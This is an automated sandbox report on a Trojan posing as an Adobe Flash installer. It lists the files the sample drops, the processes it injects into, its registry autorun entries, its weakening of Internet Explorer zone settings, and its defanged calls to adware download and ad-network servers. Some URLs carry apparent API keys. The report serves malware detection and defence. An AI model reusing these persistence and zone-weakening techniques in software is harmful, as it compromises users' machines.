MD5: 3df188fac76243f14b88bfba66be3d82
SHA1: 497e6fb0d6e67cf0a387093c2a1044e8510acdfd
SHA256: 3962414683f9d3984c59bf2c0c2dda3409b7f94b5eab5298956e36eaaf8ee874
SSDeep: 24576:bx1lywp0w3oc43IHwHijjgkZOOQ2p/qBypVyuzUE4of4vj2:bfzp0PkWMkCGyzg4f
Size: 1064960 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2016-04-06 19:52:42
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

AWWN2JS6NI.exe:1136
win.exe:2044
regsvr32.exe:232
i_network.exe:908

The Trojan injects its code into the following process(es):

%original file name%.exe:244
wizzcaster.exe:196
wizzcaster.exe:520
sps.exe:1524
i_network.exe:344

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:244 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\sps.exe (54618 bytes)

The process sps.exe:1524 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Sound \uninstaller.exe (71159 bytes)
%Program Files%\Sound \wizzcaster.exe (8281 bytes)
%Program Files%\Sound \i_network.exe (13274 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\AWWN2JS6NI.exe (243103 bytes)
%Program Files%\Sound \UninstallerCaster.exe (10932 bytes)

The process AWWN2JS6NI.exe:1136 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\AccessControl.dll (13 bytes)
%Program Files%\Sound \Uninstall.exe (1980 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp (230704 bytes)
%Program Files%\Sound \silentconfigurator.exe (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\NSISpcre.dll (6360 bytes)
%Program Files%\Sound \silentunconfigurator.exe (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\System.dll (10 bytes)
%Program Files%\Sound \Sound .exe (143233 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Sound 1.0\Sound .lnk (670 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Sound 1.0\Uninstall.lnk (685 bytes)
%Documents and Settings%\%current user%\Desktop\Sound .lnk (658 bytes)
%Program Files%\Sound \SoundP.dll (79722 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\AccessControl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\NSISpcre.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1.tmp (0 bytes)

The process win.exe:2044 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Caster\Uninstaller.exe (8907 bytes)
%Program Files%\Caster\wizzcaster.exe (7851 bytes)

The process i_network.exe:344 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\W5216IULIU\win.exe (8846 bytes)
%Program Files%\Sound \config.conf (38 bytes)

Registry activity

The process %original file name%.exe:244 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CB 96 3B 27 DC 35 3E 08 A2 C1 91 57 1A 6B 88 CB"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"sps.exe" = "6IFH488UW"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process wizzcaster.exe:196 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 54 9C 56 EC D8 69 66 ED 5B 09 23 62 E8 C3 54"

[HKCU\Software\Wizzlabs\Wizzcaster]
"UserName" = "004193207192007144030033089028111014129027067035"
"wizztracki_user_name" = "004193207192007144030033089028111014129027067035"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Wizzlabs\Wizzcaster]
"Install Day" = "1476511692"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Wizzlabs\Wizzcaster]
"wizztracki_api_key" = "117236077146106152003095211195039039240039166134055122027077161063064119122174000100011126175035222105122090001206021058107024144129142209018052"
"api_key" = "203091244096184171062073185162044227126063121253"

[HKCU\Software\Wizzlabs\Wizzcaster\15 10 2016]
"403" = "2"

The process wizzcaster.exe:520 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 E3 E5 98 55 18 A2 A3 1B E0 8A 50 F2 A6 1A C8"

[HKCU\Software\Wizzlabs\Wizzcaster\15 10 2016]
"403" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process sps.exe:1524 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SoundPlus]
"UninstallString" = "%Program Files%\Sound \uninstaller.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}]
"UninstallString" = "%Program Files%\Sound \UninstallerCaster.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Sound ]
"i_network.exe" = "6IFH488UW"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Sound ]
"wizzcaster.exe" = "I677"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}]
"Publisher" = "Caster"

[HKCU\Software\Microsoft\idsc]
"partner" = "coinis"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}]
"DisplayVersion" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\idsc]
"channel" = "3"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"AWWN2JS6NI.exe" = "AWWN2JS6NI"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "76 53 3E A1 8E F5 F7 E5 86 CA 89 27 A4 67 D0 59"

[HKCU\Software\Microsoft\idsc]
"Product" = "soundplus"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}]
"DisplayName" = "Caster"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Caster" = "%Program Files%\Sound \wizzcaster.exe"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process AWWN2JS6NI.exe:1136 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SoundPlus]
"UninstallString" = "%Program Files%\Sound \Uninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SoundPlus]
"InstallDate" = "20161004134627"
"NoModify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx3.tmp\NSISpcre.dll,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SoundPlus]
"DisplayVersion" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SoundPlus]
"DisplayName" = "Sound "

[HKLM\SOFTWARE\SoundPlus]
"Start Menu Folder" = "Sound 1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\SoundPlus]
"InstallPath" = "%Program Files%\Sound "

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SoundPlus]
"NoRepair" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Audio]
"DisableProtectedAudioDG" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 37 AE E0 70 EC C5 88 43 8F A5 D4 C9 AF B8 DD"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SoundPlus]
"CustomID" = "241932503"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\SoundPlus]
"ConfigPath" = "%Program Files%\Sound \config"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Sound " = "%Program Files%\Sound \Sound .exe"

The process win.exe:2044 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Caster]
"wizzcaster.exe" = "I677"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}]
"UninstallString" = "%Program Files%\Caster\Uninstaller.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}]
"DisplayName" = "Caster"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}]
"Publisher" = "Caster"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}]
"DisplayVersion" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Wizzlabs\Wizzcaster]
"Identifier" = "csdi"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 7E 88 1D 9F 65 0C 89 D8 B8 85 2A 91 DB 9F 73"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Caster" = "%Program Files%\Caster\wizzcaster.exe"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The process regsvr32.exe:232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 3B B3 A6 8F 29 76 11 2C 11 5F 54 B7 AB 0B 13"

The process i_network.exe:344 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 41 FC BB 38 49 6F 58 4D AB 67 87 98 53 53 C4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp\W5216IULIU]
"win.exe" = "4DT6VLUZ"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"IDSCPRODUCT" = "%Program Files%\Sound \i_network.exe"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process i_network.exe:908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 AB 13 00 15 EA 54 F4 81 42 AF EC 5A 51 00 86"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version: 1.0.0.0
Legal Copyright: Flash
Legal Trademarks:
Original Filename: adobe_flash.exe
Internal Name: adobe_flash.exe
File Version: 1.0.0.0
File Description: Flash
Comments:
Language: English (United States)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://sup.newsoftweb.com/px/pxc.php	46.51.192.203
hxxp://dl.wizzuniquify.com/download/1/soundplus-installer.exe	164.132.161.107
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_installer_soundplus_coinis_3_start	151.80.19.137
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_installer_soundplus_coinis_3_wizzproduct_download_start	151.80.19.137
hxxp://dl.azalee.site/download/1/wizzproduct.exe	94.23.77.245
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_installer_soundplus_coinis_3_wizzproduct_download_succeed	151.80.19.137
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_installer_soundplus_coinis_3_wizzproduct_execute_succeed	151.80.19.137
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_installer_soundplus_coinis_3_product_download_start	151.80.19.137
hxxp://dl.azalee.site/download/1/soundplus-widget.exe	94.23.77.245
hxxp://www.csdimonetize.com/remotes_xml_sections.php	151.80.21.123
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_installer_soundplus_coinis_3_product_download_succeed	151.80.19.137
hxxp://dl.azalee.site/download/3/WizzCasterInstaller.exe	94.23.77.245
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_installer_soundplus_coinis_3_product_execute_succeed	151.80.19.137
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_installer_soundplus_coinis_3_wizzuninstaller_download_start	151.80.19.137
hxxp://dl.azalee.site/download/1/soundplus-uninstaller.exe	94.23.77.245
hxxp://dl.wizzuniquify.com/download/3/wizzcaster.exe	164.132.161.107
hxxp://dl.wizzuniquify.com/download/3/wizzcasterUninstaller.exe	164.132.161.107
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_installer_soundplus_coinis_3_wizzuninstaller_download_succeed	151.80.19.137
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_installer_soundplus_coinis_3_done	151.80.19.137
hxxp://wizzcaster.com/api/v1/configuration?username=csdi&password=68b07047-1e8d-47ef-8332-09a2c83ad539	164.132.160.193
hxxp://wizzcaster.com/api/v2/ads?user_name=csdi&api_key=56f25c2b4eced&days_after_install=0	164.132.160.193
hxxp://agent.wizztrakys.com/csdi/wizzcaster/68	151.80.19.137
hxxp://www.xmediaserve.com/apu.php?n=&zoneid=14335&cb=INSERT_RANDOM_NUMBER_HERE&popunder=1&direct=1	78.140.181.169
hxxp://www.xmediaserve.com/apu2.php?n=&zoneid=14335&cb=INSERT_RANDOM_NUMBER_HERE&popunder=1&direct=1&vdsvdi=8VRkQKTXyGgciKcbxKSwmKowHFXzq1yUd0DvQ74Wn62IqQlLOnkLQ2Ag8evEGIE3	78.140.181.169
hxxp://www.xmediaserve.com/apu2.php?n=&zoneid=14335&cb=INSERT_RANDOM_NUMBER_HERE&popunder=1&direct=1&vdsvdi=Ullu8N6JrU+X5VHawNoIRvVMDzCO66rNcdc4RMED1NgMHRbYt++4YkcxijctWDqk	78.140.181.169
hxxp://engine.phn.doublepimp.com/link.engine?guid=acdcc8ca-2da5-40a4-be1c-c1355bb0eac0&Hardlink=true&time=0&SubID=14335&tid=as3a69f752f41747b8e938f36478162c9e&dp=3270664418.501309.78515570f2.14335.3a69f752f41747b8e938f36478162c9e	69.89.69.99
hxxp://tah.originalcleanbrands.com/?kw=14335&s1=3270664418.497271.63a7f377f8.14335.2e6c1690aa2e2344ccce41cfc15da3b5&s2=pc	206.221.181.130
hxxp://engine.phn.doublepimp.com/Redirect.eng?MediaSegmentId=17334&dcid=3_ctx_67bc49d4-8baf-474c-be66-7a5257825257&vmId=f7c3cd08-7204-4692-bd82-bc4f9e177b64&abr=false&timeZoneOffset=	69.89.69.99
hxxp://ovuzz.win-land.0698.ws/?sov=5388363&hid=eoewomqgokemi&&redid=7931&gsid=68&campaign_id=106&id=XNSX.3270664418.497271.63a7f377f8.14335.2e6c1690aa2e2344ccce41cfc15da3b5::pc-r7931-t68&impid=bfe8920c-929d-11e6-8baf-aa1f778d2780
hxxp://trk-1.com/doublepimp/ppuacs/?param=MH RON	188.164.255.28
hxxp://cosmicwin.com/vulkanchampion/p9302/?atp=MH RON&plid=1706&bnid=7462&goto=sitereg&face=casino	78.140.140.50
hxxp://ovuzz.win-land.0698.ws/FRE298certifiedwinnerALL.html
hxxp://a22-35.so.clients.cdn13.com/pp/promo/9302/css/main.css
hxxp://a22-35.so.clients.cdn13.com/pp/promo/9302/img/bg-desktop.jpg
hxxp://a22-35.so.clients.cdn13.com/pp/promo/9302/img/logo-24-1.png
hxxp://a22-35.so.clients.cdn13.com/pp/promo/9302/img/logo-24-2.png
hxxp://a22-35.so.clients.cdn13.com/pp/promo/9302/img/txt1.png
hxxp://a22-35.so.clients.cdn13.com/pp/promo/9302/img/txt2.png
hxxp://a22-35.so.clients.cdn13.com/pp/promo/9302/img/btns.png
hxxp://prod.c.ssl.global.fastlylb.net/nr-974.min.js
hxxp://prod.l.ssl.global.fastlylb.net/offer.asp?offer=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e
hxxp://bam.nr-data.net/1/84bb06feff?a=15611681&v=974.7d740e1&to=NQEGZkFWWBdQUURRWgxLMUBaGF8KVVdIFkUKFA==&rst=1375&ref=hxxp://cosmicwin.com/vulkanchampion/p9302/&ap=54&fe=1047&dc=1047&at=GUYFEAlMSxk=&jsonp=NREUM.setToken
